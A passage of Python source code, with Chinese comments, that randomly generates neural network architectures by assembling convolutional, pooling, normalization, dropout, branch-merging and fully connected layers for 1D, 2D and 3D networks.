output_length_fc2 = 0
range_list = random.sample(range(10,1015),1000)
for i in range(1000):
output_length_fc2 = range_list[i]
output_length_fc1 = int(fc_params_num / (input_length + output_length_fc2))
if(input_length > output_length_fc1 and output_length_fc1 > output_length_fc2):
break
assert i < 999, "找不到合适的全连接层"
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
elif(self.dimension == 2):
#生成CNN网络
stay_channel_prob = 0.5
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
#生成多流神经网络的一条
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," 第",block,"个block")
#一条中的多个block
input_batch_size,input_channels,input_height,input_width = last_block_input_size
out_channels = 1
out_shape = 0
# 生成2 3 4整数倍的out channels
if block < 5:
out_shape = self.prob_random([int(input_height*0.5),int(input_height/3)],[0.9,0.1])
if(input_channels <= 3):
out_channels = random.randint(16,32)
else:
out_channels = random.randint(int(input_channels*2),input_channels*3)
if(random.randint(1,100) < 30):
out_channels = self.prob_random([input_channels,input_channels*2,input_channels*3,input_channels*4,input_channels*6],[0.2,0.6,0.12,0.05,0.03])
if out_channels > 1000:
out_channels = self.prob_random([int(out_channels/4),int(out_channels/2),out_channels],[0.3,0.5,0.2])
#使最终out_channels期望稳定
if(random.randint(1,100) < 20):
out_channels = input_channels
if out_shape < 7:
out_shape = input_height
else:
out_shape = self.prob_random([int(input_height*0.5),input_height],[0.1,0.9])
if(input_channels <= 300):
out_channels = self.prob_random([input_channels,input_channels*2,input_channels*3],[0.3,0.6,0.1])
else:
out_channels = self.prob_random([int(input_channels/2),input_channels,input_channels*2],[0.4,0.4,0.2])
if out_channels > 1000:
out_channels = self.prob_random([int(input_channels/4),int(input_channels/2),out_channels],[0.3,0.5,0.2])
#使最终out_channels期望稳定
if(random.randint(1,100) < 20):
out_channels = input_channels
if out_shape < 7:
out_shape = input_height
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,out_shape,out_shape]
# print('output_size',output_size)
#block = 0 时,接收初始输入,为last_block_index = -1
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
#记录每个流最后一个块的输出大小
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print("生成流结束")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
#把不同流的结果连接起来
if(stream_output_size[0] != stream_output_size[1]):
if(stream_output_size[0][2] > stream_output_size[1][2]):# 第一个更大一些
#在第一个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_height,input_width = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:#第二个更大一些
#在第二个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_height,input_width = last_block_input_size
output_size = stream_output_size[0]
last_block_index = self.make_block(last_block_input_size,output_size,last_block_index,4)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
if(random.randint(1,100) < 30):
#Add
# print("流 添加Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3]
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("流 添加concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * len(stream_output_index)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
#生成全连接层
if(random.randint(1,100) < self.delete_fc_prob * 100):
#不接全连接层
return
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]
if input_length > 10000:
#加一个adaptiveavgpool层
out_shape = random.randint(1,3)
final_output_size = [input_fc_size[0],input_fc_size[1],out_shape,out_shape]
input_ada_size = input_fc_size
input_fc_size = final_output_size
# print('adaptive',final_output_size)
params = self.make_layer(13,input_ada_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
input_fc_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # 加入层id列表中
self.layer_num += 1
#计算前面所有层的参数数量
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
#获取全连接层的个数
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 10:
fc_num += 1
if(fc_num == self.max_fc_num):
break
# fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
# while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
# fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
# fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
# #生成全连接层,全连接层参数个数占比在80%左右
# now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]
# print('input_fc_size',input_fc_size)
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = random.randint(50,2000)
if(random.randint(1,100) < 10):
output_length = 1000
# print(fc_params_num,input_length)
# assert output_length > 0, "找不到合适的全连接层"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
else:
output_length_fc1 = 0
output_length_fc2 = 0
range_list = random.sample(range(10,1015),1000)
for i in range(1000):
output_length_fc2 = random.randint(50,2000)
output_length_fc1 = random.randint(500,2000)
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
# for i in range(0,fc_num):
# # print("全连接层的上一层",input_fc_size)
# batch_size = input_fc_size[0]
# if(i == fc_num - 1):
# output_length = random.randint(10,1000)
# params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
# self.layer_parameters += params #加入参数向量中
# link_list=[self.layer_num-1]
# self.layer_link += self.get_link_vector(link_list,self.layer_num)
# self.layer_id += [21] # 加入层id列表中
# self.layer_num += 1
# input_length = output_length
# output_length = int(output_length / random.randint(10,50))
else:
#生成CNN网络 3维
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
#生成多流神经网络的一条
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," 第",block,"个block")
#一条中的多个block
input_batch_size,input_channels,input_depth,input_height,input_width = last_block_input_size
out_channels = 1
if(input_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(input_channels*2),input_channels*4)
output_depth = self.prob_random([int(input_depth*0.5),input_depth],[0.3,0.7])
out_shape = self.prob_random([int(input_height*0.5),input_height,int(input_height/3)],[0.8,0.2,0.1])
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,output_depth,out_shape,out_shape]
#block = 0 时,接收初始输入,为last_block_index = -1
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
#记录每个流最后一个块的输出大小
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print('stream_output_size',stream_output_size)
# print("生成流结束")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
#把不同流的结果连接起来
if(stream_output_size[0] != stream_output_size[1]):
if(stream_output_size[0][2] > stream_output_size[1][2]):# 第一个更大一些
#在第一个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_depth,input_height,input_width = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:#第二个更大一些
#在第二个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_depth,input_height,input_width = last_block_input_size
output_size = stream_output_size[0]
last_block_index = self.make_block(last_block_input_size,output_size,last_block_index,4)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
# print('stream_output_size',stream_output_size)
if(random.randint(1,100) < 30):
#Add
# print("流 添加Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * stream_output_size[0][4]
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("流 添加concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * stream_output_size[0][3] * stream_output_size[0][4] * len(stream_output_index)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
#生成全连接层
if(random.randint(1,100) < self.delete_fc_prob * 100):
#不接全连接层
return
#计算前面所有层的参数数量
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
#获取全连接层的个数
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 20:
fc_num += 1
if(fc_num == self.max_fc_num):
break
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
#生成全连接层,全连接层参数个数占比在80%左右
now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]*input_fc_size[3]*input_fc_size[4]
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = int(fc_params_num / input_length)
# print('fc_params_num,input_length,before_fc_params_num',fc_params_num,input_length,before_fc_params_num)
assert output_length > 0, "找不到合适的全连接层"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
else:
output_length_fc1 = 0
output_length_fc2 = 0
range_list = random.sample(range(10,1015),1000)
for i in range(1000):
output_length_fc2 = range_list[i]
output_length_fc1 = int(fc_params_num / (input_length + output_length_fc2))
if(input_length > output_length_fc1 and output_length_fc1 > output_length_fc2):
break
assert i < 999, "找不到合适的全连接层"
batch_size = input_fc_size[0]
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length_fc1])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
params = self.make_layer(21,[batch_size,output_length_fc1],[batch_size,output_length_fc2])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
def make_block(self,input_size,output_size,last_block_index,max_branch_layer,branch_prob = 0.1):
'''
input_size接收上一层输入的尺寸
output_size输出尺寸
max_branch_layer每一个分支最多的层数
生成一个神经网络块,该块中的层只与块中的其他层有联系,不与其他块有联系,块中不包含FC层。
规则:
①卷积层、批标准化、激活层、池化层一般遵循如下顺序:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),
nn.ReLU(True),
nn.MaxPool2d(2, 2)
但是前后可以接多个Conv,Pool
②如果是concat,channel可以不一样。如果是add,所有shape都要一样。
branch_prob表示生成一个分支的概率为branch_prob,生成两个为branch_prob*branch_prob,以此类推
'''
# print("生成block...",input_size,output_size)
channels = output_size[1]#用来记录合并后的channels
branch_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= branch_prob*100:
branch_num += 1
if(self.dimension == 1):
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_1d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#连接起来
if(random.randint(1,100) < 30):
#Add
#print("添加Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
else:
#concat
# print("添加concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
elif(self.dimension == 2):
if branch_num == 1 and input_size[1] > 256 and random.randint(1,100) <= 50:
linaer_layer_output_index = self.make_Bottleneck_layers_2d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_2d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#连接起来
if(random.randint(1,100) < 30):
#Add
#print("添加Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
else:
#concat
# print("添加concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
else:
for branch_index in range(0,branch_num):
linaer_layer_output_index = self.make_linear_layers_3d(last_block_index,input_size,output_size)
linaer_layer_output_index_list.append(linaer_layer_output_index)
if(branch_num > 1):
#连接起来
if(random.randint(1,100) < 30):
#Add
#print("添加Add")
params = self.make_layer(24,output_size,add_num=len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
else:
#concat
# print("添加concat")
params = self.make_layer(23,output_size,out_channels=output_size[1] * len(linaer_layer_output_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(linaer_layer_output_index_list,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
channels = channels * len(linaer_layer_output_index_list)
return self.layer_num - 1,channels #返回块输出元素
def make_linear_layers_3d(self,last_block_index,input_size,final_output_size):
'''
生成一个线性的,即没有分支的CNN块
例如:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),或者dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("生成make_linear_layers_2d...",input_size,final_output_size)
no_conv_prob = 0.1
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#有conv层,如果没有,以pool层替换,并省略后续的Relu等
#前提条件是channels数相等,否则无法取消conv层
conv_num = 1
while random.randint(1,100) <= 20:
#计算叠加几个卷积层
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#加入CNN层
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#如果是最后一个层了,要把channel数一致
params = self.make_layer(2,last_layer_input_size,final_output_size)
else:
if random.randint(1,100) <= 20:
#卷积层
params = self.make_layer(2,last_layer_input_size)
else:
#反卷积层
params = self.make_layer(5,last_layer_input_size)
ConvTranspose = True
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
if(i==0):
#表示接收上一块的合并节点的输入
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#表示接收上个节点作为输入
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
if ConvTranspose:
self.layer_id += [5] # 加入层id列表中
self.layer_num += 1
else:
self.layer_id += [2] # 加入层id列表中
self.layer_num += 1
ConvTranspose = False
#加入BatchNorm或dropout层
if(random.randint(1,100) < self.batchNorm_prob*100):
#加入BatchNorm
params = self.make_layer(17,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [17] # 加入层id列表中
self.layer_num += 1
else:
if(random.randint(1,100) < self.dropout_prob*100):
#加入Dropout
dropout_type = self.prob_random([20,26],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # 加入层id列表中
self.layer_num += 1
#加入激活层
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入pool、unpool层
#加入Pool层
if random.randint(1,100) >= 20:
params = self.make_layer(8,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [8] # 加入层id列表中
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 20:
params = self.make_layer(11,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [11] # 加入层id列表中
self.layer_num += 1
else:
params = self.make_layer(14,last_layer_input_size,final_output_size)
output_size = params[5:10]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [14] # 加入层id列表中
self.layer_num += 1
return self.layer_num - 1 #返回该线性序列的最后一个节点的索引号
def make_linear_layers_2d(self,last_block_index,input_size,final_output_size):
'''
生成一个线性的,即没有分支的CNN块
例如:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),或者dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("生成make_linear_layers_2d...",input_size,final_output_size)
no_conv_prob = 0.05
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#有conv层,如果没有,以pool层替换,并省略后续的Relu等
#前提条件是channels数相等,否则无法取消conv层
conv_num = 1
while random.randint(1,100) <= 40:
#计算叠加几个卷积层
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#加入CNN层
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#如果是最后一个层了,要把channel数一致
params = self.make_layer(1,last_layer_input_size,final_output_size)
else:
# if random.randint(1,100) <= 97:
#卷积层
params = self.make_layer(1,last_layer_input_size)
# else:
# #反卷积层
# params = self.make_layer(4,last_layer_input_size)
# ConvTranspose = True
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
if(i==0):
#表示接收上一块的合并节点的输入
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#表示接收上个节点作为输入
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
# if ConvTranspose:
# self.layer_id += [4] # 加入层id列表中
# self.layer_num += 1
# else:
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
ConvTranspose = False
#加入激活层
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
if(random.randint(1,100) < 80):
#加入BatchNorm
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
if(random.randint(1,100) < 30 and not self.no_dropout):
#加入Dropout
dropout_type = self.prob_random([19,25],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # 加入层id列表中
self.layer_num += 1
#加入Pool层
if random.randint(1,100) >= 50:
params = self.make_layer(7,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
pool_type = params[-1]
# if pool_type == 0 and random.randint(1,100) <= 20:
# params = self.make_layer(10,last_layer_input_size,final_output_size)
# output_size = params[4:8]
# last_layer_input_size = output_size
# self.layer_parameters += params #加入参数向量中
# link_list=[self.layer_num-1]
# self.layer_link += self.get_link_vector(link_list,self.layer_num)
# self.layer_id += [10] # 加入层id列表中
# self.layer_num += 1
else:
params = self.make_layer(13,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # 加入层id列表中
self.layer_num += 1
return self.layer_num - 1 #返回该线性序列的最后一个节点的索引号
def make_Bottleneck_layers_2d(self,last_block_index,input_size,final_output_size):
'''
生成一个线性的,即没有分支的CNN块
例如:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),或者dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("make_Bottleneck_layers_2d...",input_size,final_output_size)
more_conv_prob = 0.2
max_conv_num = 5
conv_num = 3
last_layer_input_size = input_size
if(input_size[1] != final_output_size[1]):
#有conv层,如果没有,以pool层替换,并省略后续的Relu等
#前提条件是channels数相等,否则无法取消conv层
conv_num = 3
while random.randint(1,100) <= 20:
#计算叠加几个卷积层
conv_num += 1
if(conv_num == max_conv_num):
break
mid_channels = self.prob_random([int(input_size[1]/6),int(input_size[1]/4),int(input_size[1]/2)],[0.3,0.4,0.3])
# print(conv_num)
#加入CNN层
for i in range(0,conv_num):
if(i==conv_num-1):
#如果是最后一个层了,要把channel数一致
params = self.make_layer(1,last_layer_input_size,final_output_size)
else:
params = self.make_layer(1,last_layer_input_size,[last_layer_input_size[0],mid_channels,last_layer_input_size[2],last_layer_input_size[3]])
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
if(i==0):
#表示接收上一块的合并节点的输入
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#表示接收上个节点作为输入
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
#加入激活层
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
ConvTranspose = False
if(random.randint(1,100) < 80):
#加入BatchNorm
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
if(random.randint(1,100) < 30 and not self.no_dropout):
#加入Dropout
dropout_type = self.prob_random([19,25],[0.8,0.2])
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # 加入层id列表中
self.layer_num += 1
#加入pool、unpool层
#加入Pool层
if random.randint(1,100) >= 80:
params = self.make_layer(7,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 10:
params = self.make_layer(10,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [10] # 加入层id列表中
self.layer_num += 1
else:
params = self.make_layer(13,last_layer_input_size,final_output_size)
output_size = params[4:8]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [13] # 加入层id列表中
self.layer_num += 1
return self.layer_num - 1 #返回该线性序列的最后一个节点的索引号
def make_linear_layers_1d(self,last_block_index,input_size,final_output_size):
'''
生成一个线性的,即没有分支的CNN块
例如:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),或者dropout
nn.ReLU(True),
nn.MaxPool2d(2, 2)
'''
# print("生成make_linear_layers_2d...",input_size,final_output_size)
no_conv_prob = 0.1
more_conv_prob = 0.2
max_conv_num = 3
last_layer_input_size = input_size
if(random.randint(1,100) > no_conv_prob*100 or input_size[1] != final_output_size[1]):
#有conv层,如果没有,以pool层替换,并省略后续的Relu等
#前提条件是channels数相等,否则无法取消conv层
conv_num = 1
while random.randint(1,100) <= 20:
#计算叠加几个卷积层
conv_num += 1
if(conv_num == max_conv_num):
break
# print(conv_num)
#加入CNN层
for i in range(0,conv_num):
ConvTranspose = False
if(i==conv_num-1):
#如果是最后一个层了,要把channel数一致
params = self.make_layer(0,last_layer_input_size,final_output_size)
else:
if random.randint(1,100) <= 20:
#卷积层
params = self.make_layer(0,last_layer_input_size)
else:
#反卷积层
params = self.make_layer(3,last_layer_input_size)
ConvTranspose = True
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
if(i==0):
#表示接收上一块的合并节点的输入
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
else:
#表示接收上个节点作为输入
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
if ConvTranspose:
self.layer_id += [3] # 加入层id列表中
self.layer_num += 1
else:
self.layer_id += [0] # 加入层id列表中
self.layer_num += 1
ConvTranspose = False
#加入BatchNorm或dropout层
if(random.randint(1,100) < self.batchNorm_prob*100):
#加入BatchNorm
params = self.make_layer(15,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [15] # 加入层id列表中
self.layer_num += 1
else:
if(random.randint(1,100) < self.dropout_prob*100):
#加入Dropout
dropout_type = 18
params = self.make_layer(dropout_type,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [dropout_type] # 加入层id列表中
self.layer_num += 1
#加入激活层
params = self.make_layer(22,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入pool、unpool层
#加入Pool层
if random.randint(1,100) >= 20:
params = self.make_layer(6,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
